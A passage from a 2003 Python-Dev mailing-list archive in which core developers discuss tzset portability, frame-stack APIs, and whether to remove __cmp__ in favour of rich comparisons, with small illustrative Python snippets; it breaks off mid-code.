Worse, if the platform tzset() isn't happy with TZ's value, it has no way to
tell you:  the function is declared void, and has no defined effects on
errno.
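
A small sketch of that last point from the Python side, assuming a platform
where time.tzset() is built at all.  The helper name try_tz and the bogus
zone name are made up; the expectation is that both calls come back with
None and no exception, so the caller learns nothing about whether the
platform liked the value.

```python
import os
import time


def try_tz(value):
    """Set TZ to value, call time.tzset(), and return whatever it returns."""
    if not hasattr(time, "tzset"):     # not available on every platform
        return None
    saved = os.environ.get("TZ")
    os.environ["TZ"] = value
    try:
        return time.tzset()            # thin wrapper around the void C call
    finally:
        # Restore the previous setting so the sketch has no lasting effect.
        if saved is None:
            del os.environ["TZ"]
        else:
            os.environ["TZ"] = saved
        time.tzset()


print(try_tz("EST5EDT"))
print(try_tz(":no/such/zone"))
```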

I hope the community takes up the challenge of building a sane
cross-platform time zone facility building on 2.3 datetime's tzinfo objects.


From tim.one@comcast.net  Sun Mar 16 05:28:04 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 16 Mar 2003 00:28:04 -0500
Subject: [Python-Dev] tzset
In-Reply-To: <2ADB787D-56B0-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEFEBAB.tim.one@comcast.net>

[Stuart Bishop]
> ...
> To me, this is the useful format as all the others require you to
> know your DST transition times rather than rely on the OS to supply them.

But since there are no defined names in POSIX, supplying transition rules
explicitly via the second POSIX format is the only way that has a shot at
being portable.

> At the moment if the 'path to a tzfile(5)' format is not accepted, your
> tzset(3) is considered broken and time.tzset not built.

I'll let the Unix weenies straighten out their own mess here <wink>.

> I'm happy to rewrite the detection in configure.in and the test in
> test_time.py to lower the bar on this, but I think a better solution
> may be to determine if Windows has a format that lets us to DST
> calculations and keep the bar high.

I couldn't parse that, but I've got no interest in exposing the Windows
version of tzset() to Python users regardless (it's a lame effort to mimic
part of the Unixish TZ gimmicks; the Win32 API has a richer way to deal with
time zones, which doesn't use environment variables).


From arigo@tunes.org  Sun Mar 16 07:33:03 2003
From: arigo@tunes.org (Armin Rigo)
Date: Sat, 15 Mar 2003 23:33:03 -0800 (PST)
Subject: [Python-Dev] PyEval_GetFrame() revisited
In-Reply-To: <3E7219D1.6090306@tismer.com>; from tismer@tismer.com on Fri, Mar 14, 2003 at 07:05:05PM +0100
References: <3E7204EC.60506@tismer.com> <3E7219D1.6090306@tismer.com>
Message-ID: <20030316073303.31B3E5147@bespin.org>

Hello Christian,

On Fri, Mar 14, 2003 at 07:05:05PM +0100, Christian Tismer wrote:
> > where the PyEval_GetGlobals is used instead of
> >               tstate->frame->f_globals
> Ah!!
> Can it be that PyEval_GetFrame() is just intended
> to signal to an extension like Psyco that it needs
> to quickly invent a frame now?

Yes, indeed.  This was a very limited hack so that the frame would get the
correct locals even in the presence of Psyco.  Now I realize that it may have
been pointless anyway, if this dummy frame is never really used but for
tracebacks.

Maybe an API to manipulate tstate->frame could be useful and really
lightweight.  Alternatively, we could consider what pyexpat does as a general
pattern and have an API for it, e.g.:

PyFrame_Push(PyFrameObject* f) ->
    pushes 'f' on the frame stack, assert()ing that f->f_back is tstate->frame
    or pushes a new placeholder frame if 'f' is NULL.
    This also calls the profile and trace hooks.

PyFrame_Pop() ->
    pops the frame, calling profile and trace hooks,
    and recording a traceback if PyErr_Occurred().

and maybe a PyFrame_FromC() function that creates a placeholder with
controllable parameters as in pyexpat.c:getcode().


A bientôt,

Armin.


From guido@python.org  Sun Mar 16 12:32:04 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 16 Mar 2003 07:32:04 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: "Your message of 15 Mar 2003 18:44:36 EST."
 <yu99adfw5h5n.fsf@europa.research.att.com>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
 <yu99adfw5h5n.fsf@europa.research.att.com>
Message-ID: <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>

> Guido> Yes.  And I'm still hoping to remove __cmp__; there should be
> Guido> only one way to overload comparisons.
> 
> Moreover, for some data structures, the __cmp__ approach can be
> expensive.  For example, if you're comparing sequences of any kind,
> and you know that the comparison is for == or !=, you have your answer
> immediately if the sequences differ in length.  If you don't know
> what's being tested, as you wouldn't inside __cmp__, you may spend a
> lot more time to obtain a result that will be thrown away.

Yes.  OTOH, as long as cmp() is in the language, these same situations
are more efficiently done by a __cmp__ implementation than by calling
__lt__ and then __eq__ or similar (it's hard to decide which order is
best).  So cmp() should be removed at the same time as __cmp__.

And then we should also change list.sort(), as Tim points out.  Maybe
we can start introducing this earlier by using keyword arguments:

  list.sort(lt=function)     sorts using a < implementation
  list.sort(cmp=function)    sorts using a __cmp__ implementation

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar 16 13:06:02 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 16 Mar 2003 08:06:02 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: "Your message of Sun, 16 Mar 2003 07:32:04 EST."
 <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
 <yu99adfw5h5n.fsf@europa.research.att.com>
 <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>

> > Guido> Yes.  And I'm still hoping to remove __cmp__; there should be
> > Guido> only one way to overload comparisons.

[Andrew]
> > Moreover, for some data structures, the __cmp__ approach can be
> > expensive.  For example, if you're comparing sequences of any kind,
> > and you know that the comparison is for == or !=, you have your answer
> > immediately if the sequences differ in length.  If you don't know
> > what's being tested, as you wouldn't inside __cmp__, you may spend a
> > lot more time to obtain a result that will be thrown away.

[Guido]
> Yes.  OTOH, as long as cmp() is in the language, these same situations
> are more efficiently done by a __cmp__ implementation than by calling
> __lt__ and then __eq__ or similar (it's hard to decide which order is
> best).  So cmp() should be removed at the same time as __cmp__.

I realized the first sentence wasn't very clear.  I meant that
implementing cmp() is inefficient without __cmp__ for some types
(especially container types).  Example:

 cmp(range(1000)+[1], range(1000)+[0])

If the list type implements __cmp__, each of the pairs of items is
compared once.  OTOH, if the list type only implemented __lt__, __eq__
and __gt__, cmp() presumably would have to try one of those first, and
then another one.  If it picked __lt__ followed by __eq__, it would
get two False results in a row, meaning it could return 1 (cmp()
doesn't really expect incomparable results :-), but at the cost of
comparing each pair of items twice.  If cmp() picked another set of
two operators to try, I'd simply adjust the example.
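
The counting argument can be sketched with hand-written sequence
comparisons (all function names below are hypothetical, and the pair
counter is only there to make the cost visible).  A single three-way pass
visits each pair of items once; emulating cmp() with a less-than pass
followed by an equality pass visits each pair twice.

```python
def cmp_items(x, y):
    return (x > y) - (x < y)


def three_way(a, b, count):
    """One pass, in the style of a __cmp__ implementation."""
    for x, y in zip(a, b):
        count[0] += 1
        c = cmp_items(x, y)
        if c:
            return c
    return cmp_items(len(a), len(b))


def seq_lt(a, b, count):
    for x, y in zip(a, b):
        count[0] += 1
        if x != y:
            return x < y
    return len(a) < len(b)


def seq_eq(a, b, count):
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        count[0] += 1
        if x != y:
            return False
    return True


def cmp_via_rich(a, b, count):
    """cmp() emulated by trying < first and then ==."""
    if seq_lt(a, b, count):
        return -1
    if seq_eq(a, b, count):
        return 0
    return 1


a = list(range(1000)) + [1]
b = list(range(1000)) + [0]
once, twice = [0], [0]
print(three_way(a, b, once), once[0])
print(cmp_via_rich(a, b, twice), twice[0])
```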

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz@pythoncraft.com  Sun Mar 16 15:37:14 2003
From: aahz@pythoncraft.com (Aahz)
Date: Sun, 16 Mar 2003 10:37:14 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net> <b4vp23$vec$1@main.gmane.org> <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net> <yu99adfw5h5n.fsf@europa.research.att.com> <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net> <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030316153714.GA17944@panix.com>

On Sun, Mar 16, 2003, Guido van Rossum wrote:
>
> I realized the first sentence wasn't very clear.  I meant that
> implementing cmp() is inefficient without __cmp__ for some types
> (especially container types).  Example:
> 
>  cmp(range(1000)+[1], range(1000)+[0])
> 
> If the list type implements __cmp__, each of the pairs of items is
> compared once.  OTOH, if the list type only implemented __lt__, __eq__
> and __gt__, cmp() presumably would have to try one of those first, and
> then another one.  If it picked __lt__ followed by __eq__, it would
> get two False results in a row, meaning it could return 1 (cmp()
> doesn't really expect incomparable results :-), but at the cost of
> comparing each pair of items twice.  If cmp() picked another set of
> two operators to try, I'd simply adjust the example.

That's something I've been thinking about.  I use cmp() for that purpose
in the BCD module, because I do need the 3-way result (and it appears
that Eric kept that).  OTOH, it's certainly easy enough to define a
cmp() function, and not having the builtin wouldn't kill performance.
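
For instance, a user-level replacement might be as small as the sketch
below.  It is built from < and >, so it costs up to two rich comparisons
per call, and it assumes the operands are totally ordered.

```python
def cmp(a, b):
    """Three-way compare: negative, zero or positive, like the builtin."""
    return (a > b) - (a < b)


print(cmp(1, 2), cmp(2, 2), cmp(3, 2))
print(cmp([1, 2], [1, 3]))
```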
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

Register for PyCon now!  http://www.python.org/pycon/reg.html


From ark@research.att.com  Sun Mar 16 16:02:13 2003
From: ark@research.att.com (Andrew Koenig)
Date: Sun, 16 Mar 2003 11:02:13 -0500 (EST)
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
 (message from Guido van Rossum on Sun, 16 Mar 2003 08:06:02 -0500)
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
 <yu99adfw5h5n.fsf@europa.research.att.com>
 <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net> <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303161602.h2GG2DO00056@europa.research.att.com>

Guido> I realized the first sentence wasn't very clear.  I meant that
Guido> implementing cmp() is inefficient without __cmp__ for some types
Guido> (especially container types).  Example:

Guido>  cmp(range(1000)+[1], range(1000)+[0])

Guido> If the list type implements __cmp__, each of the pairs of items
Guido> is compared once.  OTOH, if the list type only implemented
Guido> __lt__, __eq__ and __gt__, cmp() presumably would have to try
Guido> one of those first, and then another one.  If it picked __lt__
Guido> followed by __eq__, it would get two False results in a row,
Guido> meaning it could return 1 (cmp() doesn't really expect
Guido> incomparable results :-), but at the cost of comparing each
Guido> pair of items twice.  If cmp() picked another set of two
Guido> operators to try, I'd simply adjust the example.

Yes.  If you want to present a 3-way comparison to users, an
underlying 3-way comparison is the fastest way to do it.  The trouble
is that a 3-way comparison is definitely not the fastest way to
present a 2-way comparison to users.

So if you want users to see separate 2-way and 3-way comparisons,
I think the fastest way to implement them is not to try to force
commonality where none exists.


From ark@research.att.com  Sun Mar 16 18:59:30 2003
From: ark@research.att.com (Andrew Koenig)
Date: 16 Mar 2003 13:59:30 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEECEBAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCOEECEBAB.tim.one@comcast.net>
Message-ID: <yu993clnjfxp.fsf@europa.research.att.com>

Tim> [Guido]
>> Yes.  And I'm still hoping to remove __cmp__; there should be only one
>> way to overload comparisons.

Tim> As long as we're going to break everyone's code, list.sort(f)
Tim> should also be redefined then so that f returns a Boolean, f(a,
Tim> b) meaning a is less than b.

I don't think it's necessary to break code in order to accommodate
that change, as long as you're willing to tolerate one extra
comparison per call to sort, plus a small amount of additional
overhead.

As I understand it, the problem is to distinguish between a function
that returns negative, zero, or positive, depending on the result of
the comparison, and a function that returns true or false.  So if we
had a way to determine efficiently which kind of function the user
supplied, we could maintain compatibility.

Imagine, then, that we have a function f, and we want to figure out
which kind of function it is.  Assume, furthermore, that the only kind
of comparisons we want to perform is to determine whether a < b for
various values of a and b.

Note first that whenever f(a, b) returns 0, we don't care which kind
of function f is, because a < b will be false in either case.  So we
allow our sort algorithm to run until the first time a call to f(a, b)
returns a nonzero value.

Now we can determine what kind of function f is by calling f(b, a).
If f(b, a) is zero, then f is a boolean predicate.  If f(b, a) is
nonzero, then f returns negative/zero/positive -- and, incidentally,
f(b, a) had better have the opposite sign from f(a, b).

I understand that there is some overhead involved in storing the
information about which kind of comparison it is, and testing it on
each comparison.  I suspect, however, that that overhead can be made
small compared to the overhead involved in calling the comparison
function itself.
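
A minimal sketch of the detection scheme described above.  AdaptiveLess and
sort_with are hypothetical names, and the sketch assumes f is consistent
(a predicate for which f(a, b) and f(b, a) are both true would be
misclassified).  The wrapper probes f(b, a) exactly once, the first time
f(a, b) returns something nonzero.

```python
class AdaptiveLess:
    """Answer 'is a < b?' using f, whichever kind of function f is."""

    def __init__(self, f):
        self.f = f
        self.kind = None              # unknown until the first nonzero result

    def __call__(self, a, b):
        r = self.f(a, b)
        if not r:                     # 0 or False: a < b is false either way
            return False
        if self.kind is None:         # first nonzero result: probe once
            self.kind = "three-way" if self.f(b, a) else "boolean"
        if self.kind == "boolean":
            return True
        return r < 0


def sort_with(items, f):
    """Return a sorted copy of items using either kind of f."""
    less = AdaptiveLess(f)

    class Key:
        def __init__(self, value):
            self.value = value

        def __lt__(self, other):
            return less(self.value, other.value)

    return [k.value for k in sorted(Key(v) for v in items)]


data = [3, 1, 2]
print(sort_with(data, lambda a, b: a < b))               # boolean predicate
print(sort_with(data, lambda a, b: (a > b) - (a < b)))   # three-way function
```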


-- 
Andrew Koenig, ark@research.att.com, http://www.research.att.com/info/ark


From thomas@xs4all.net  Sun Mar 16 19:42:00 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Sun, 16 Mar 2003 20:42:00 +0100
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net> <b4vp23$vec$1@main.gmane.org> <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net> <yu99adfw5h5n.fsf@europa.research.att.com> <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030316194200.GO2112@xs4all.nl>

On Sun, Mar 16, 2003 at 07:32:04AM -0500, Guido van Rossum wrote:

> > Guido> Yes.  And I'm still hoping to remove __cmp__; there should be
> > Guido> only one way to overload comparisons.

[ Andrew Koenig ]
> > Moreover, for some data structures, the __cmp__ approach can be
> > expensive.  For example, if you're comparing sequences of any kind,
> > and you know that the comparison is for == or !=, you have your answer
> > immediately if the sequences differ in length.  If you don't know
> > what's being tested, as you wouldn't inside __cmp__, you may spend a
> > lot more time to obtain a result that will be thrown away.

> Yes.  OTOH, as long as cmp() is in the language, these same situations
> are more efficiently done by a __cmp__ implementation than by calling
> __lt__ and then __eq__ or similar (it's hard to decide which order is
> best).  So cmp() should be removed at the same time as __cmp__.

I'm confused, as well as conflicted. I know I'm not well educated in
language design or mathematics, and I realize that comparisons between types
don't always make *mathematical* sense, but to go from there to removing
type-agnostic (not the right term, but bear with me) list-sorting and
three-way comparison altogether is really a big jump, and one I really don't
agree with. I find being able to sort (true) heterogeneous lists in a
consistent if not 'purely' sensible manner to be quite useful at times, and
all other times I already know I have a homogeneous list and don't care
about it. It's a practical approach because I don't have to think about how
it's going to be sorted, I don't have to take every edge case into account,
and I don't have to know in advance what my list is going to contain (or
update all calls to 'sort' when I find I have to add a conflicting type to
the list.) I do not see how this is harmful; the cases I've seen where
people bump into this the hard way (e.g. doing "0" < 1) were fundamental
misunderstandings that would be corrected in a dozen other ways. Allowing
'senseless' comparisons does not strike me as a major source of confusion or
bad code.
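
For comparison, a sketch of how a consistent (if arbitrary) ordering of a
heterogeneous list can be spelled out explicitly.  This assumes a later
Python (3.x) in which a plain sort of such a list raises TypeError; the key
function name type_then_value is made up, and grouping by type name is just
one possible convention.

```python
def type_then_value(obj):
    """Sort key: group by type name, then order within each type."""
    return (type(obj).__name__, obj)


mixed = [3, "pear", 1, "apple", 2.5]
print(sorted(mixed, key=type_then_value))
```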

I was uneasy about the change in complex number comparison, but I didn't
mind that, then, because it is a very rarely used feature to start with and
when looking at it from a 'unified number' point of view, it makes perfect
sense. But the latter does not apply to most other types, and I don't
believe it should. My defensive programming nature (I write Perl for a
living, if I wasn't defensive by nature I'd have committed suicide by now)
would probably make me always use a 'useful sorter' function, possibly by
using subclasses of list (so I could guard against other subtle changes,
too, by changing one utility library, tw.Tools. Yuck.) I really don't like
how that affects the readability of the code. I'd feel better about
disallowing '==' for floating point numbers, as I can see why that is a
problem. But I don't feel good about that either ;)

I really like how most Python objects are convenient. Lists grow when you
need them to, slices do what you think they do, dicts can take any
(hashable) object as a key (boy, do I miss that in Perl), mathematical
operations work with simple operators even between types, objects,
instances, classes and modules all behave consistently and have consistent
syntax. Yes, Python has some odd quirks, some of which require a comment or
two when writing code that will be read by people with little or no Python
knowledge (e.g. my colleagues.) But I believe adding a small comment like
"'global' is necessary to *assign* to variables in the module namespace" or
"'%(var)s' is how we say '$var'" or "'x and y or s' is like 'x ? y : s' if y
is true, which it always is here" or any of the half-dozen other things I
can imagine, not counting oddities in standard modules, is preferable over
forcing the syntax or restricting the usage to try and 'solve' the quirks.

> And then we should also change list.sort(), as Tim points out.  Maybe
> we can start introducing this earlier by using keyword arguments:

>   list.sort(lt=function)     sorts using a < implementation
>   list.sort(cmp=function)    sorts using a __cmp__ implementation

Perhaps we need stricter prototypes, that define the return value. Or
properties on (or classes of) functions, so we can tell whether a function
implements the lessthan interface, or the threeway one. It would definitely
*look* better than the above ;)

Practically-beats-this-idea-in-my-eyes'ly y'rs ;)
-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido@python.org  Sun Mar 16 20:34:17 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 16 Mar 2003 15:34:17 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: "Your message of Sun, 16 Mar 2003 11:02:13 EST."
 <200303161602.h2GG2DO00056@europa.research.att.com>
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it>
 <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net>
 <b4vp23$vec$1@main.gmane.org>
 <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
 <yu99adfw5h5n.fsf@europa.research.att.com>
 <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net>
 <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net>
 <200303161602.h2GG2DO00056@europa.research.att.com>
Message-ID: <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>

> Guido> I realized the first sentence wasn't very clear.  I meant that
> Guido> implementing cmp() is inefficient without __cmp__ for some types
> Guido> (especially container types).  Example:
> 
> Guido>  cmp(range(1000)+[1], range(1000)+[0])
> 
> Guido> If the list type implements __cmp__, each of the pairs of items
> Guido> is compared once.  OTOH, if the list type only implemented
> Guido> __lt__, __eq__ and __gt__, cmp() presumably would have to try
> Guido> one of those first, and then another one.  If it picked __lt__
> Guido> followed by __eq__, it would get two False results in a row,
> Guido> meaning it could return 1 (cmp() doesn't really expect
> Guido> incomparable results :-), but at the cost of comparing each
> Guido> pair of items twice.  If cmp() picked another set of two
> Guido> operators to try, I'd simply adjust the example.

[Andrew Koenig]
> Yes.  If you want to present a 3-way comparison to users, an
> underlying 3-way comparison is the fastest way to do it.  The trouble
> is that a 3-way comparison is definitely not the fastest way to
> present a 2-way comparison to users.
> 
> So if you want users to see separate 2-way and 3-way comparisons,
> I think the fastest way to implement them is not to try to force
> commonality where none exists.

This seems an argument for keeping both __cmp__ and the six __lt__
etc.  Yet TOOWTDI makes me want to get rid of __cmp__.

I wonder, what's the need for cmp()?  My hunch is that the main reason
for cmp() is that it's specified in various APIs -- e.g. list.sort(),
or FP hardware.  But don't those APIs usually specify cmp() because
their designers (mistakenly) believed the three different outcomes
were easy to compute together and it would simplify the API?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From python@rcn.com  Sun Mar 16 20:43:49 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 16 Mar 2003 15:43:49 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net> <b4vp23$vec$1@main.gmane.org> <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net> <yu99adfw5h5n.fsf@europa.research.att.com> <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net> <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net> <200303161602.h2GG2DO00056@europa.research.att.com> <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <002501c2ebfc$d68f59c0$125ffea9@oemcomputer>

> [Andrew Koenig]
> > Yes.  If you want to present a 3-way comparison to users, an
> > underlying 3-way comparison is the fastest way to do it.  The trouble
> > is that a 3-way comparison is definitely not the fastest way to
> > present a 2-way comparison to users.
> > 
> > So if you want users to see separate 2-way and 3-way comparisons,
> > I think the fastest way to implement them is not to try to force
> > commonality where none exists.
> 
> This seems an argument for keeping both __cmp__ and the six __lt__
> etc.  Yet TOOWTDI makes me want to get rid of __cmp__.

Recent experience with sets.py shows that __cmp__ has a high
PITA factor when combined with rich comparisons.  There was no
good way to produce all of the desired behaviors:

 *  <, <=, >, >=  having subset interpretations
 *  __cmp__ being marked as not implemented
 * cmp(a,b) not by-passing __cmp__ when __lt__ and __eq__
    were defined.

The source of the complications is that comparing Set('a') and Set('b')
returns False for *all* of  <, <=, ==, >=, >.  Internally, three-way
compares relied on the falsehood of some implying the truth of
others.
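
The same effect can be seen with the builtin set type of later Pythons
(used here as a stand-in for sets.py, which is an assumption).  naive_cmp
is a hypothetical three-way compare that trusts "not less and not equal"
to mean "greater", which is exactly the inference that breaks down.

```python
a, b = set("a"), set("b")

results = {
    "<": a < b,
    "<=": a <= b,
    "==": a == b,
    ">=": a >= b,
    ">": a > b,
}
print(results)                 # every entry is False for disjoint sets


def naive_cmp(x, y):
    """Three-way compare that assumes a total order."""
    if x < y:
        return -1
    if x == y:
        return 0
    return 1                   # wrong conclusion for incomparable sets


print(naive_cmp(a, b), naive_cmp(b, a))   # claims each is greater than the other
```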


Raymond Hettinger


From pedronis@bluewin.ch  Sun Mar 16 20:48:11 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Sun, 16 Mar 2003 21:48:11 +0100
Subject: [Python-Dev] Re: Re: lists v. tuples
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net> <b4vp23$vec$1@main.gmane.org> <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net> <yu99adfw5h5n.fsf@europa.research.att.com> <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net> <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net> <200303161602.h2GG2DO00056@europa.research.att.com> <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <028801c2ebfd$5bc6be80$6d94fea9@newmexico>

From: "Guido van Rossum" <guido@python.org>
>
> This seems an argument for keeping both __cmp__ and the six __lt__
> etc.  Yet TOOWTDI makes me want to get rid of __cmp__.
>

one minor problem with the six __lt__ etc is that they should be all defined.
For quick things (although I know better) I still define just __cmp__ out of
laziness.

regards


From python@rcn.com  Sun Mar 16 21:59:56 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 16 Mar 2003 16:59:56 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
References: <20030312164902.10494.64514.Mailman@mail.python.org> <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com> <200303150857.53214.aleax@aleax.it> <200303151236.h2FCaJP06038@pcp02138704pcs.reston01.va.comcast.net> <b4vp23$vec$1@main.gmane.org> <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net> <yu99adfw5h5n.fsf@europa.research.att.com> <200303161232.h2GCW4Q15556@pcp02138704pcs.reston01.va.comcast.net> <200303161306.h2GD62L15598@pcp02138704pcs.reston01.va.comcast.net> <200303161602.h2GG2DO00056@europa.research.att.com> <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net> <028801c2ebfd$5bc6be80$6d94fea9@newmexico>
Message-ID: <001701c2ec07$624f8520$125ffea9@oemcomputer>

> one minor problem with the six __lt__ etc is that they should be all defined.
> For quick things (although I know better) I still define just __cmp__ out of
> laziness.

Sometime back, I proposed a mixin for this.

class C(CompareMixin):
     def __eq__(self, other): ...
     def __lt__(self, other): ...

The __eq__ by itself is enough to get __ne__ defined for you.
Defining both __eq__ and __lt__ gets you all the rest.
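
A sketch of how such a mixin might be written; this is a guess at the
idea, not the code that was actually proposed, and Version is an invented
example class.  It assumes a total order, so it would not suit types like
sets.  Later Pythons ship functools.total_ordering, which does a similar
job as a class decorator.

```python
class CompareMixin:
    """Derive !=, <=, > and >= from __eq__ and __lt__ (hypothetical)."""

    def _eq_lt(self, other):
        eq = self.__eq__(other)
        lt = self.__lt__(other)
        if eq is NotImplemented or lt is NotImplemented:
            return None
        return bool(eq), bool(lt)

    def __ne__(self, other):
        eq = self.__eq__(other)
        return eq if eq is NotImplemented else not eq

    def __le__(self, other):
        pair = self._eq_lt(other)
        return NotImplemented if pair is None else (pair[0] or pair[1])

    def __gt__(self, other):
        pair = self._eq_lt(other)
        return NotImplemented if pair is None else not (pair[0] or pair[1])

    def __ge__(self, other):
        lt = self.__lt__(other)
        return lt if lt is NotImplemented else not lt


class Version(CompareMixin):
    def __init__(self, number):
        self.number = number

    def __eq__(self, other):
        if not isinstance(other, Version):
            return NotImplemented
        return self.number == other.number

    def __lt__(self, other):
        if not isinstance(other, Version):
            return NotImplemented
        return self.number < other.number


print(Version(1) != Version(2), Version(1) <= Version(2))
print(Version(2) > Version(1), Version(2) >= Version(2))
```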


Raymond Hettinger


From tim.one@comcast.net  Sun Mar 16 22:09:29 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 16 Mar 2003 17:09:29 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <028801c2ebfd$5bc6be80$6d94fea9@newmexico>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEENEBAB.tim.one@comcast.net>

[Samuele Pedroni]
> one minor problem with the six __lt__ etc is that they should be
> all defined.  For quick things (although I know better) I still define
> just __cmp__ out of laziness.

Or out of sanity <wink>.  2.3's datetime type is interesting that way.  The
Python implementation of that (which lives in Zope3, and in a Python
sandbox, and which you may want to use for Jython) now has lots of trivial
variations of

    def __le__(self, other):
        if isinstance(other, date):
            return self.__cmp(other) <= 0
        elif hasattr(other, "timetuple"):
            return NotImplemented
        else:
            _cmperror(self, other)

Before 2.3a2, it just defined __cmp__ and so avoided this code
near-duplication, but then we decided it would be better to let == and !=
return False and True (respectively, and instead of raising TypeError) when
mixing a date or time or datetime with some other type.
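
The behaviour described above can be sketched in Python 3 roughly as
follows.  The Day class and its ordinal attribute are made up for the
illustration, and unlike the datetime code quoted above this sketch
returns NotImplemented for every foreign type rather than calling a
helper that raises:

```python
class Day:
    """Hypothetical date-like class; `ordinal` is an assumed day count."""

    def __init__(self, ordinal):
        self.ordinal = ordinal

    def _cmp(self, other):
        # Three-way result: negative, zero, or positive.
        return (self.ordinal > other.ordinal) - (self.ordinal < other.ordinal)

    def __eq__(self, other):
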